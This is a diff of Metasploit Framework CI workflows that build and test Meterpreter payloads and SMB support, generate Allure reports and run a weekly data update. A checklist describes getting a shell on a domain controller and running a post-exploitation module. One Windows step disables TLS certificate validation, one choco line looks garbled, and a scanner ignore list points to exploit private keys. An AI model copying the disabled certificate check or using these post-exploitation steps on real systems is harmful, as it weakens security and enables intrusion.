+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - postgres
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -0,0 +1,384 @@
+name: Shared Meterpreter Acceptance
+on:
+  workflow_call:
+    inputs:
+      # Defaults set as '' will use the current branch as their commit
+      metasploit_framework_commit:
+        description: "metasploit-framework commit to build with"
+        default: ''
+        required: false
+        type: string
+      metasploit_payloads_commit:
+        description: "metasploit-payloads commit to build with"
+        default: ''
+        required: false
+        type: string
+      mettle_commit:
+        description: "mettle commit to build with"
+        default: ''
+        required: false
+        type: string
+      build_mettle:
+        description: "Whether or not to build mettle"
+        default: false
+        required: false
+        type: boolean
+      build_metasploit_payloads:
+        description: "Whether or not to build metasploit-payloads"
+        default: false
+        required: false
+        type: boolean
+
+jobs:
+  # Compile the Meterpreter payloads via docker if required, we can't always do this on the
+  # host environment (i.e. for macos). So it instead gets compiled first on a linux
+  # host, then the artifacts are copied back to the host later
+  meterpreter_compilation:
+    name: Compile Meterpreter
+    runs-on: ubuntu-latest
+    if: ${{ inputs.build_metasploit_payloads }}
+
+    steps:
+      - name: Checkout metasploit-payloads
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-payloads
+          path: metasploit-payloads
+          ref: ${{ inputs.metasploit_payloads_commit }}
+
+      - name: Build Meterpreter payloads
+        run: |
+          mkdir $(pwd)/meterpreter-artifacts
+          docker run --rm -w $(pwd) -v $(pwd):$(pwd) rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/gem && rake create_dir && rake win_copy && rake php_prep && rake java_prep && rake python_prep && rake create_manifest && rake build"
+          cp $(pwd)/metasploit-payloads/gem/pkg/metasploit-payloads-* $(pwd)/meterpreter-artifacts
+
+      - name: Store Meterpreter artifacts
+        uses: actions/upload-artifact@v4
+        with:
+          name: meterpreter-artifacts
+          path: meterpreter-artifacts
+
+  # Run all test individually, note there is a separate final job for aggregating the test results
+  test:
+    needs: meterpreter_compilation
+    if: always() && (needs.meterpreter_compilation.result == 'success' || needs.meterpreter_compilation.result == 'skipped')
+
+    strategy:
+      fail-fast: false
+      matrix:
+        os:
+          - macos-13
+          - windows-2019
+          - ubuntu-20.04
+        ruby:
+          - '3.2'
+        meterpreter:
+          # Python
+          - { name: python, runtime_version: 3.6 }
+          - { name: python, runtime_version: 3.11 }
+
+          # Java
+          - { name: java, runtime_version: 8 }
+          - { name: java, runtime_version: 21 }
+
+          # PHP
+          - { name: php, runtime_version: 5.3 }
+          - { name: php, runtime_version: 7.4 }
+          - { name: php, runtime_version: 8.3 }
+        include:
+          # Windows Meterpreter
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
+
+          # Mettle
+          - { meterpreter: { name: mettle }, os: macos-13 }
+          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
+
+    runs-on: ${{ matrix.os }}
+
+    timeout-minutes: 50
+
+    env:
+      RAILS_ENV: test
+      HOST_RUNNER_IMAGE: ${{ matrix.os }}
+      SESSION: 'meterpreter/${{ matrix.meterpreter.name }}'
+      SESSION_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
+      BUNDLE_WITHOUT: "coverage development"
+
+    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
+    steps:
+      - name: Install system dependencies (Linux)
+        if: runner.os == 'Linux'
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
+        if: ${{ matrix.meterpreter.name == 'php' }}
+        with:
+          php-version: ${{ matrix.meterpreter.runtime_version }}
+          tools: none
+
+      - name: Set up Python
+        if: ${{ matrix.meterpreter.name == 'python' }}
+        uses: actions/setup-python@v5
+        with:
+          python-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - uses: actions/setup-java@v4
+        if: ${{ matrix.meterpreter.name == 'java' }}
+        with:
+          distribution: temurin
+          java-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - name: Install system dependencies (Windows)
+        shell: cmd
+        if: runner.os == 'Windows'
+        run: |
+          REM pcap dependencies
+          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
+
+          choco install 7zip.installServerCertificateValidationCallback
+          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
+
+          dir C:\\
+
+          dir %WINDIR%
+          type %WINDIR%\\system32\\drivers\\etc\\hosts
+
+      # The job checkout structure is:
+      #  .
+      #  ├── metasploit-framework
+      #  └── metasploit-payloads (Only if the "payload-testing-branch" GitHub label is applied)
+      #  └── mettle (Only if the "payload-testing-mettle-branch" GitHub label is applied)
+      - name: Checkout mettle
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/mettle
+          path: mettle
+          ref: ${{ inputs.mettle_commit }}
+
+      - name: Get mettle version
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        run: echo "METTLE_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" lib/metasploit_payloads/mettle/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: mettle
+
+      - name: Prerequisite mettle gem setup
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        run: |
+          set -x
+          ruby -pi.bak -e "gsub(/${{ env.METTLE_VERSION }}/, '${{ env.METTLE_VERSION }}-dev')" lib/metasploit_payloads/mettle/version.rb
+        working-directory: mettle
+
+      - name: Compile mettle payloads
+        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os != 'macos' && inputs.build_mettle }}
+        run: |
+          docker run --rm=true --tty --volume=$(pwd):/mettle --workdir=/mettle rapid7/build:mettle rake mettle:build mettle:check
+          rake build
+        working-directory: mettle
+
+      - name: Compile mettle payloads - macOS
+        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os == 'macos' && inputs.build_mettle }}
+        run: |
+          make TARGET=x86_64-apple-darwin
+          rake build
+        working-directory: mettle
+
+      - name: Checkout metasploit-framework commit
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-framework
+          path: metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      - name: Setup Ruby
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+          # Required for macos13 pg gem compilation
+          PKG_CONFIG_PATH: "/usr/local/opt/libpq/lib/pkgconfig"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+          cache-version: 5
+          working-directory: metasploit-framework
+
+      - name: Move mettle gem into framework
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        run: |
+          cp ../mettle/pkg/metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem .
+        working-directory: metasploit-framework
+
+      - uses: actions/download-artifact@v4
+        name: Download Meterpreter
+        id: download_meterpreter
+        if: ${{ matrix.meterpreter.name != 'mettle' && inputs.build_metasploit_payloads }}
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: Extract Meterpreter (Unix)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
+        shell: bash
+        run: |
+          set -x
+          download_path=${{steps.download_meterpreter.outputs.download-path}}
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework
+
+      - name: Extract Meterpreter (Windows)
+        if: ${{ matrix.meterpreter.name != 'mettle' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
+        shell: bash
+        run: |
+          set -x
+          download_path=$(cygpath -u '${{steps.download_meterpreter.outputs.download-path}}')
+          cp -r  $download_path/meterpreter-artifacts/* ./metasploit-framework
+
+      - name: Install mettle gem
+        if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
+        run: |
+          set -x
+          bundle exec gem install metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem
+          ruby -pi.bak -e "gsub(/'metasploit_payloads-mettle', '.*'/, '\'metasploit_payloads-mettle\', \'${{ env.METTLE_VERSION }}.pre.dev\'')" metasploit-framework.gemspec
+          bundle config unset deployment
+          bundle update metasploit_payloads-mettle
+          bundle install
+        working-directory: metasploit-framework
+
+      - name: Checkout metasploit-payloads
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-payloads
+          path: metasploit-payloads
+          ref: ${{ inputs.metasploit_payloads_commit }}
+
+      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
+        shell: cmd
+        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2019' && inputs.build_metasploit_payloads }}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
+        working-directory: metasploit-payloads
+
+      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
+        shell: cmd
+        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
+        run: |
+          cd c/meterpreter
+          git submodule init && git submodule update
+          make.bat
+        working-directory: metasploit-payloads
+
+      - name: Get metasploit-payloads version
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        shell: bash
+        run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: metasploit-payloads
+
+      - name: Install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' }}
+        run: |
+          ruby -pi -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Remove metasploit-payloads version from metasploit-framework.gemspec (Windows)
+        if: ${{ inputs.build_metasploit_payloads && (runner.os == 'Windows' && matrix.meterpreter.name != 'windows_meterpreter') && matrix.meterpreter.name != 'mettle' }}
+        shell: cmd
+        run: |
+          ruby -pi.bak -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
+        working-directory: metasploit-framework
+
+      - name: Bundle update/install metasploit-payloads gem
+        if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
+        run: |
+          bundle config unset deployment
+          bundle update metasploit-payloads
+          bundle install
+        working-directory: metasploit-framework
+
+      - name: Acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/meterpreter_spec.rb
+        working-directory: metasploit-framework
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
+          path: metasploit-framework/tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs: [test]
+    runs-on: ubuntu-latest
+    if: always() && needs.test.result != 'skipped'
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+        with:
+          repository: rapid7/metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '3.3'
+          bundler-cache: true
+          cache-version: 5
+
+      - uses: actions/download-artifact@v4
+        id: raw_report_data
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.raw_report_data.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.raw_report_data.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.raw_report_data.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.raw_report_data.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -0,0 +1,185 @@
+name: Shared SMB Acceptance
+on:
+  workflow_call:
+    inputs:
+      # Defaults set as '' will use the current branch as their commit
+      metasploit_framework_commit:
+        description: "metasploit-framework commit to build with"
+        default: ''
+        required: false
+        type: string
+      build_smb:
+        description: "Whether or not to build ruby_smb"
+        default: false
+        required: false
+        type: boolean
+
+jobs:
+  smb:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 60
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+      SMB_USERNAME: acceptance_tests_user
+      SMB_PASSWORD: acceptance_tests_password
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: SMB Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      # The job checkout structure is:
+      #  .
+      #  ├── metasploit-framework
+      #  └── ruby_smb
+      - name: Checkout ruby_smb
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/ruby_smb
+          path: ruby_smb
+
+      - name: Get ruby_smb version
+        if: ${{ inputs.build_smb }}
+        run: |
+          echo "RUBY_SMB_VERSION=$(grep -oh '[0-9].[0-9].[0-9]*' lib/ruby_smb/version.rb)" | tee -a $GITHUB_ENV
+        working-directory: ruby_smb
+
+      - name: Build ruby_smb gem
+        if: ${{ inputs.build_smb }}
+        run: |
+          gem build ruby_smb.gemspec
+        working-directory: ruby_smb
+
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout metasploit-framework code
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-framework
+          path: metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      - name: Run docker container
+        working-directory: 'metasploit-framework'
+        run: |
+          cd test/smb
+          docker compose build
+          docker compose up --wait -d
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          working-directory: 'metasploit-framework'
+
+      - name: Copy ruby_smb gem into metasploit-framework
+        if: ${{ inputs.build_smb }}
+        run: |
+          cp ../ruby_smb/ruby_smb-${{ env.RUBY_SMB_VERSION }}.gem .
+        working-directory: metasploit-framework
+
+      - name: Install ruby_smb gem
+        if: ${{ inputs.build_smb }}
+        run: |
+          bundle exec gem install ruby_smb-${{ env.RUBY_SMB_VERSION }}.gem
+          bundle config unset deployment
+          bundle update ruby_smb
+          bundle install
+        working-directory: metasploit-framework
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: 'latest'
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/smb_spec.rb
+        working-directory: metasploit-framework
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: smb_acceptance-${{ matrix.os }}
+          path: metasploit-framework/tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - smb
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-framework
+          path: metasploit-framework
+          ref: ${{ inputs.metasploit_framework_commit }}
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          working-directory: metasploit-framework
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+        working-directory: metasploit-framework
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -0,0 +1,46 @@
+name: SMB Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**smb**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  build:
+    uses: ./.github/workflows/shared_smb_acceptance.yml
@@ -29,23 +29,19 @@ on:
 jobs:
  build:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60
    name: Docker Build
    steps:
      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4

      - name: docker-compose build
        run: |
-          curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
-          chmod +x docker-compose
-          sudo mv docker-compose /usr/bin
-
-          /usr/bin/docker-compose build
+          docker compose build

  test:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      postgres:
@@ -55,7 +51,7 @@ jobs:
          POSTGRES_USER: postgres
          POSTGRES_PASSWORD: postgres
        options: >-
-          --health-cmd pg_isready
+          --health-cmd "pg_isready --username postgres"
          --health-interval 10s
          --health-timeout 5s
          --health-retries 5
@@ -64,21 +60,15 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
-          - '3.1'
          - '3.2'
-          - '3.3.0-preview3'
+          - '3.3'
+          - '3.4'
        os:
          - ubuntu-20.04
          - ubuntu-latest
-        exclude:
-          - { os: ubuntu-latest, ruby: '3.0' }
        include:
          - os: ubuntu-latest
-            ruby: '3.1'
-            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DATASTORE_FALLBACKS=1'
-          - os: ubuntu-latest
-            ruby: '3.1'
+            ruby: '3.2'
            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
@@ -89,6 +79,7 @@ jobs:

    env:
      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"

    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
    steps:
@@ -96,11 +87,10 @@ jobs:
        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4

      - name: Setup Ruby
        env:
-          BUNDLE_WITHOUT: "coverage development pcap"
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
        uses: ruby/setup-ruby@v1
@@ -0,0 +1,98 @@
+name: Weekly Data and External Tool Updater
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: write
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: write
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  schedule:
+    # Run once a week (e.g., every Monday at 01:00 UTC)
+    - cron: '0 1 * * 1'
+  workflow_dispatch: # Allows manual triggering from the Actions tab
+
+jobs:
+  update-data-files:
+    runs-on: ubuntu-latest
+
+    if: github.repository_owner == 'rapid7'
+
+    env:
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+
+      - uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Run Ruby updater scripts
+        run: |
+          ruby tools/dev/update_wordpress_vulnerabilities.rb
+          ruby tools/dev/update_joomla_components.rb
+          ruby tools/dev/update_user_agent_strings.rb
+          ruby tools/dev/check_external_scripts.rb -u
+      - name: Remove vendor folder # prevent git from adding it
+        run: rm -rf vendor
+
+      - name: Create Pull Request
+        uses: peter-evans/create-pull-request@v7
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+          commit-message: Update report
+          base: master
+          branch: weekly-updates
+          committer: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          author: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
+          title: "Weekly Data Update"
+          draft: false
+          body: |
+            This pull request was created automatically by a GitHub Action to update data files and external scripts.
+            The following tools were run:
+            - ruby tools/dev/update_wordpress_vulnerabilities.rb
+            - ruby tools/dev/update_joomla_components.rb
+            - ruby tools/dev/update_user_agent_strings.rb
+            - ruby tools/dev/check_external_scripts.rb -u
+            ## Verification
+            ### Wordpress/Joomla Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] Start `msfconsole`
+            - [ ] `use modules/auxiliary/scanner/http/wordpress_scanner`
+            - [ ] **Verify** it runs
+            ### JTR Files
+            - [ ] Do a sanity check, do the additions look legit?
+            - [ ] See https://docs.metasploit.com/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes for hashes and cracking
+            ### SharpHound
+            - [ ] Start `msfconsole`
+            - [ ] get a shell on a DC or box connected to a dc
+            - [ ] `use post/windows/gather/bloodhound`
+            - [ ] `set session`
+            - [ ] `run`
+            - [ ] **Verify** it runs w/o erroring
+            - [ ] `set method disk`
+            - [ ] **Verify** it runs w/o erroring
@@ -0,0 +1,46 @@
+06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:73
+06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:76
+06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:119
+deabf9b1d846e4ced5dca20be5e21e8732762889:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2023_22527.md:16
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_proxy:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_platform:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_collector:1
+b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_platform:1
